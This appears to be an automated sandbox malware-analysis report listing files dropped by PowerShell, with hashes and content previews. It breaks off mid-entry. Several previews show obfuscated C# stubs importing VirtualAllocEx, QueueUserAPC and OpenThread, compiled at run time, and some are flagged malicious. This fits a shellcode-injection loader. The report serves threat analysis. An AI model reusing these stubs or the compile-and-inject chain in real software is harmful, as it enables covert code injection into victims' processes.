aun6TiMj7WQ9i1FXnXpUM2uPh/+s/TPA/m4z7NuTaytRjZZ/SA/AuxfDNWn936LKFW0M782l/nwvWrn9ml3+scKWZd5z7qIINn34luhBSQYvc8g2TpGUKK6bxGyV9gI2n2+SdmTLq7nWX27/uWO4KzE60nP8aeDfChQG5+cXhzDG9mhSxvU4WSzTlK11+Ah8JItrtt/qnGjSveOLT0+GvLbHtkx0l0CntcbsZoObAOET/em6hORmzJ4byejmMEOACqRlj880

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	11606
Entropy (8bit):	4.883977562702998
Encrypted:	false
SSDEEP:	192:Axoe5FpOMxoe5Pib4GVsm5emdKVFn3eGOVpN6K3bkkjo5HgkjDt4iWN3yBGHh9sO:6fib4GGVoGIpN6KQkj2Akjh4iUxs14fr
MD5:	1F1446CE05A385817C3EF20CBD8B6E6A
SHA1:	1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D
SHA-256:	2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
SHA-512:	252AD962C0E8023419D756A11F0DDF2622F71CBC9DAE31DC14D9C400607DF43030E90BCFBF2EE9B89782CC952E8FB2DADD7BDBBA3D31E33DA5A589A76B87C514
Malicious:	false
Preview:	PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.9260988789684415
Encrypted:	false
SSDEEP:	3:Nlllulb/lj:NllUb/l
MD5:	13AF6BE1CB30E2FB779EA728EE0A6D67
SHA1:	F33581AC2C60B1F02C978D14DC220DCE57CC9562
SHA-256:	168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
SHA-512:	1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
Malicious:	false
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\4puomjgc\4puomjgc.0.cs Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text
Category:	dropped
Size (bytes):	413
Entropy (8bit):	4.95469485629364
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuJAMRSRa+eNMjSSRrEMx9SRHq1DAfWZSEehEFQy:V/DTLDfuA9eg5rEMx8u25hZy
MD5:	66C992425F6FC8E496BCA0C59044EDFD
SHA1:	9900C115A66028CD4E43BD8C2D01401357FD7579
SHA-256:	85FEE59EDA69CF81416915A84F0B8F7D8980A3A582B5FA6CC27A8C1340838B6C
SHA-512:	D674884748328A261D3CB4298F2EB63B37A77182869C5E3B462FAB917631FC1A6BB9B266CAD4E627F68C3016A2EEADCD508FDDBAF818E2F12E51B97325D9406D
Malicious:	false
Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class iteocetkyp. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint hmli,uint odfa);.[DllImport("kernel32")].public static extern IntPtr VirtualAllocEx(IntPtr cieceahsrf,IntPtr qipockeo,uint fmaounwoa,uint hdhq,uint fssner);.. }..}.

C:\Users\user\AppData\Local\Temp\4puomjgc\4puomjgc.cmdline Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	375
Entropy (8bit):	5.214870815451486
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723foG+zxs7+AEszIN723foc:p37Lvkmb6K2av+WZETar
MD5:	7B9663E1A84ABF30711AE70F314F495A
SHA1:	41D7B18C7655000E5A6F2CF6A50766AA7E2B09BE
SHA-256:	9E3C34A37F012A0281F637442FF538D7B22875E4CEB2761F1161FBB1212E381B
SHA-512:	002EF18F2F25B27DB1B9316A840DFE9BD0ECE179F9A08749CAD56D50E562AE9ADF7664ED11480E657DC3C16C8A4330CC83D15493413B6CDFC585C7CF40249C64
Malicious:	false
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\4puomjgc\4puomjgc.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\4puomjgc\4puomjgc.0.cs"

C:\Users\user\AppData\Local\Temp\4puomjgc\4puomjgc.dll Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.6259341187170526
Encrypted:	false
SSDEEP:	24:etGS0M+WEei8MT38s2EGx1FdWC0PtkZfRNBqmw7I+ycuZhN/akSRPNnq:6O7qMTMpEGx1LWCdJRN81ul/a3jq
MD5:	6983CD0E5B92043ACD7925424E3BE395
SHA1:	BFF0FDA948CA3C130C7A24AD9D842B9A2CC3B6F9
SHA-256:	5164A45782E5E62BE47F95AF605833B2074BBBF20022EBFFB96772371CF67F8E
SHA-512:	339166E94ABE362964AA161FEE5FAD15D2ED1BC06C9DBDCCE607C095A3C6A076A85CB7CD89F95948F9EEA197551373AEBE55DA727DA55E8DA73EA1DC4AB9B1F7
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...f.&`...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...P...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................6./...............&.......................".............. =............ O............ W.....P ......f.........l.....q.....v...........................f.!...f...!.f.&...f.......+.....4.9.....=.......O.......W.......................................&..........<Module>.4puomjgc.dll.iteocetkyp.W3

C:\Users\user\AppData\Local\Temp\4puomjgc\4puomjgc.out Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	412
Entropy (8bit):	4.871364761010112
Encrypted:	false
SSDEEP:	12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
MD5:	83B3C9D9190CE2C57B83EEE13A9719DF
SHA1:	ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
SHA-256:	B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
SHA-512:	0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
Malicious:	false
Preview:	Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\4puomjgc\CSCC6FE28103CDC4CEEBA53F6CD503CAE96.TMP Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.0999602372133572
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry8Uak7Ynqq/5PN5Dlq5J:+RI+ycuZhN/akSRPNnqX
MD5:	7BD58154B650E5D284A3172FEFC564EB
SHA1:	17AEEED63E6994680E1092C01DE6C12D479999F0
SHA-256:	733B07B756725F686268096C4514A9CFAF74AFF8374C9B8E599E1F9B2DA46EB4
SHA-512:	A1DC3149A27F82660BB2EB576665A48DAD1B7AF83AE86B9DCD725D514E77C48803B2340F2CA3B824CD4051B573DD2BF1D55B87B718FF32901632F488E37876B3
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...4.p.u.o.m.j.g.c...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...4.p.u.o.m.j.g.c...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\51oepeny\51oepeny.0.cs Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text
Category:	dropped
Size (bytes):	413
Entropy (8bit):	4.95469485629364
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuJAMRSRa+eNMjSSRrEMx9SRHq1DAfWZSEehEFQy:V/DTLDfuA9eg5rEMx8u25hZy
MD5:	66C992425F6FC8E496BCA0C59044EDFD
SHA1:	9900C115A66028CD4E43BD8C2D01401357FD7579
SHA-256:	85FEE59EDA69CF81416915A84F0B8F7D8980A3A582B5FA6CC27A8C1340838B6C
SHA-512:	D674884748328A261D3CB4298F2EB63B37A77182869C5E3B462FAB917631FC1A6BB9B266CAD4E627F68C3016A2EEADCD508FDDBAF818E2F12E51B97325D9406D
Malicious:	true
Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class iteocetkyp. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint hmli,uint odfa);.[DllImport("kernel32")].public static extern IntPtr VirtualAllocEx(IntPtr cieceahsrf,IntPtr qipockeo,uint fmaounwoa,uint hdhq,uint fssner);.. }..}.

C:\Users\user\AppData\Local\Temp\51oepeny\51oepeny.cmdline Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	375
Entropy (8bit):	5.160580680820552
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723flct1M0zxs7+AEszIN723flct1eH:p37Lvkmb6K2a9ct19WZETa9ct1eH
MD5:	45D74F1EE2CEA2F2DB6910E09EACA6E1
SHA1:	02FFEBFE4694F5C964DC92F6DE0E69AED522B111
SHA-256:	8E0DEE7057ABEA40AAC1CE839FF842AEAE9A9B843A53EA8BD767FDD1AD745C1A
SHA-512:	477C4E962B11C9A2D8B4A07AF4F41D09E6B46841714A4BAEA5C65FA42A47018862F6BE4137980E70522ACD9685A70EBFA811D173ABECB35C569D96CB0164A971
Malicious:	false
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\51oepeny\51oepeny.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\51oepeny\51oepeny.0.cs"

C:\Users\user\AppData\Local\Temp\51oepeny\51oepeny.out Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	460
Entropy (8bit):	5.306702248601164
Encrypted:	false
SSDEEP:	6:IM7mLAA9VwRhMuAu+H2LvkuqJDdqxLTKbDdqB/6K2N723flct1M0zxs7+AEszIN5:xKIR37Lvkmb6K2a9ct19WZETa9ct1ee
MD5:	1BBD9219EF07958C34D63B043CBA1A81
SHA1:	760083482AA942211424206EFF773112C63E29D2
SHA-256:	D0CA79E757B1DB426CE83E8D0E7CE00EE419E9F41D803982463CD00BE2D3DD4A
SHA-512:	E8363C38871048B6D944D2F613FDDDF79708A91C8BCC2623EDE4578C9A5D800B0F01C26E101514CE38079716659E956BDE334AC0F0B4513BA6E7F8A64CDF1313
Malicious:	false
Preview:	.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\51oepeny\51oepeny.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\51oepeny\51oepeny.0.cs"......

C:\Users\user\AppData\Local\Temp\JavaDeployReg.log Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	89
Entropy (8bit):	4.357175050784355
Encrypted:	false
SSDEEP:	3:oVXUHOu1/KdQS408JOGXnEHOu1/KdQS4bCn:o9UtCu0qEtCum
MD5:	3570F139124EF9EC6BE074E66ED280A3
SHA1:	67B005414BB2C8514C0C53B0C6BACB6B57595292
SHA-256:	6ED333D046BA0A14DE28FC7020AEB805C9FE12202C3A1486650E3760A1949332
SHA-512:	35A0F754F12978EEE1F46110A9D519FE0D2C1448E4B348579CC5A77E9F4ACD2FF62152E44EEC6423DBB4119B2370426EEB622C506503522BA88A471743E6BAB6
Malicious:	false
Preview:	[2021/02/12 10:00:47.857] Latest deploy version: ..[2021/02/12 10:00:47.857] 11.211.2 ..

C:\Users\user\AppData\Local\Temp\RES3102.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	data
Category:	dropped
Size (bytes):	2192
Entropy (8bit):	2.7115001335038085
Encrypted:	false
SSDEEP:	24:ea3aHrhKdNfI+ycuZhNyakSaPNnq9SpPm9c:bqVKd91ulya3Wq9Y
MD5:	CE3EBCE6A8813BA8BBA7057640D3E495
SHA1:	C751652831E1AE0012F4FE9DE3B18E5C2A731B0E
SHA-256:	2D7D83267E96F122BFB0EF69E35817D8F740EF5EFE9C293C9C07386CF1375E25
SHA-512:	3D6C11277B6718D6E5A42300BC65C66D35B4D2D3E1B2EDDEB10A9BE89AB98637E0822EB4C20AABE7764133955D8F27E0CC5F603BE1A18447B37D4BE43609C8AB
Malicious:	false
Preview:	........W....c:\Users\user\AppData\Local\Temp\cuuygyc1\CSCC66BFCF5E1994D52B7125888E8D0949B.TMP...................}.....e..HO...........7.......C:\Users\user\AppData\Local\Temp\RES3102.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\RES3577.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	data
Category:	dropped
Size (bytes):	2192
Entropy (8bit):	2.719273130635786
Encrypted:	false
SSDEEP:	24:eafaHzhKdNfI+ycuZhNpakS3PNnq9SpJm9c:by9Kd91ulpa3lq9O
MD5:	C48C537A6BD8FC77BAB64317B6B4AD05
SHA1:	6A6DE13B958578E2D9838499BF3BD15CB5B2B4FE
SHA-256:	C3348537ACCB3E54476904A044410853BF7715C72509F1FA1779BF2C302E58A5
SHA-512:	E0E31D40F7330DF63D4D886705483E54ED49E7D35358C663F7A7D5E74A72EB4253B3FB0D28C6FC4855693C17FE736CFA02E55FF7CC04CF85CD58AE3F52BABA47
Malicious:	false
Preview:	........W....c:\Users\user\AppData\Local\Temp\lojdfmf3\CSC1A2D97838D3A497FBCCAE884ABC3AAE9.TMP.................Ds.#..].G..I............7.......C:\Users\user\AppData\Local\Temp\RES3577.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0vypiyij.x2o.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_240ytxdc.pjs.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dvhjmosr.kkn.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s1ou22r1.pxt.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\cuuygyc1\CSCC66BFCF5E1994D52B7125888E8D0949B.TMP Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.1020455527895066
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryKLak7Ynqq5kPN5Dlq5J:+RI+ycuZhNyakSaPNnqX
MD5:	B5F3C07D00BC2ECCCD65CB9C81484FFC
SHA1:	B0822A561BBB0420EAAD720A8F3A92C83B89DE41
SHA-256:	DB990A8050220B60DA0FDF8F48AFF6AB9094EA9BB85F77DEADFFA81427D6EBE0
SHA-512:	E35C9FAF6BDE0E5A96153EDF019CAD4D48BC415D129F25C0FC53378085E1486E356C05C7F298F34760019BB69EA79734853D01B5696085FA1DFDB687E2BDD5A7
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...c.u.u.y.g.y.c.1...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...c.u.u.y.g.y.c.1...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\cuuygyc1\cuuygyc1.0.cs Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text
Category:	dropped
Size (bytes):	411
Entropy (8bit):	5.022568322197063
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuJwQ5mMRSR7a1yTyShSRa+rVSSRnA/fh14v02JKy:V/DTLDfuqRySQ9rV5nA/TDy
MD5:	9B2165E59D51BB6E8E99190BD9C6BC8B
SHA1:	02B2F188D7654CA079ADA726994D383CF75FF114
SHA-256:	36E14435EE02B02C2B06087FF3750569342E8B8D8571F3F45E61AF50D3B03CEA
SHA-512:	20E05DE0D57D1F6F53FB3290CB1C533D152C6076E2451B0A463D5AD6342976F49F31DDA8CC668E3EC26775E75EE191B8DD44645F40F723667EE8376C84998209
Malicious:	false
Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class tseeoxqndt. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr jphxxkfdthf,IntPtr lnf,IntPtr uet);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint wwqqeyldba,uint ccghpcxllqj,IntPtr tobsn);.. }..}.

C:\Users\user\AppData\Local\Temp\cuuygyc1\cuuygyc1.cmdline Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	375
Entropy (8bit):	5.203144379710725
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723foEGzxs7+AEszIN723foEb:p37Lvkmb6K2aMWZETap
MD5:	7A41BA0E2FC0F2C0D5B5EDFC404D5BB5
SHA1:	DF994EA8E43D2C66107B3F643F17CDD1C3782FDA
SHA-256:	AD5314F2AC1DA22BCFC03468EF8EA8A7B343A36D7B70684927F48F81F4999765
SHA-512:	2F58ED679F643C637A6599EE7F3BFF15734AD9538EEB614947D3DFC41DC28A20F07904DA9A5D4F2F500F065B11662C493D130C7130005EA852517716C062EB93
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\cuuygyc1\cuuygyc1.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\cuuygyc1\cuuygyc1.0.cs"

C:\Users\user\AppData\Local\Temp\cuuygyc1\cuuygyc1.dll Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.629092782785538
Encrypted:	false
SSDEEP:	24:etGS98+mDR853RY0JGH4lp2tkZfIq5DZ0hEdI+ycuZhNyakSaPNnq:6zmS5+kjJIqxZ6Ed1ulya3Wq
MD5:	295C56FD18C36EC0815D56CF55045E28
SHA1:	65B5E08013364C80DCDF0F0EA135EA796B078300
SHA-256:	1C926A659E8036152792784858DCD49757420C4A33540C1F5ED5E31A7197C9AD
SHA-512:	63879FAAADB60C853722A6879696412D390FD9F91D9FB95D31FD7F5F07A3CE12249048A60AD4EF0F2E412AF096AD27542473747518D2B87A1AEA9DA8632CCE1B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a.&`...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....BSJB............v4.0.30319......l...H...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................6./...............%.......................".............. =............ J............ ].....P ......h.........n.....z.....~.....................h. ...h...!.h.%...h............3.8.....=.......J.......].......................................&........<Module>.cuuygyc1.dll.tseeoxqndt.W32.mscorl

C:\Users\user\AppData\Local\Temp\cuuygyc1\cuuygyc1.out Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	412
Entropy (8bit):	4.871364761010112
Encrypted:	false
SSDEEP:	12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
MD5:	83B3C9D9190CE2C57B83EEE13A9719DF
SHA1:	ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
SHA-256:	B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
SHA-512:	0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
Malicious:	false
Preview:	Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\lojdfmf3\CSC1A2D97838D3A497FBCCAE884ABC3AAE9.TMP Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.0969814893774212
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryrak7Ynqq3PN5Dlq5J:+RI+ycuZhNpakS3PNnqX
MD5:	884473D823B61D5DB447F69249E7DAA8
SHA1:	E3EC17815204F566A463F62B27C2BDDF3BC898E6
SHA-256:	4DA380101887AEFFE7853D084880539F6B0591608D161B33C38AEF282CD7FBF3
SHA-512:	36CCAC9B5B97121F3D4DF92BA0ADC134C29A66776ECBFED26205C7AE3B214F839B3AC75C348A2B71FB9711516D71474C65E9D2667DE5753CFCBB24921DA10439
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...l.o.j.d.f.m.f.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...l.o.j.d.f.m.f.3...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\lojdfmf3\lojdfmf3.0.cs Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text
Category:	dropped
Size (bytes):	411
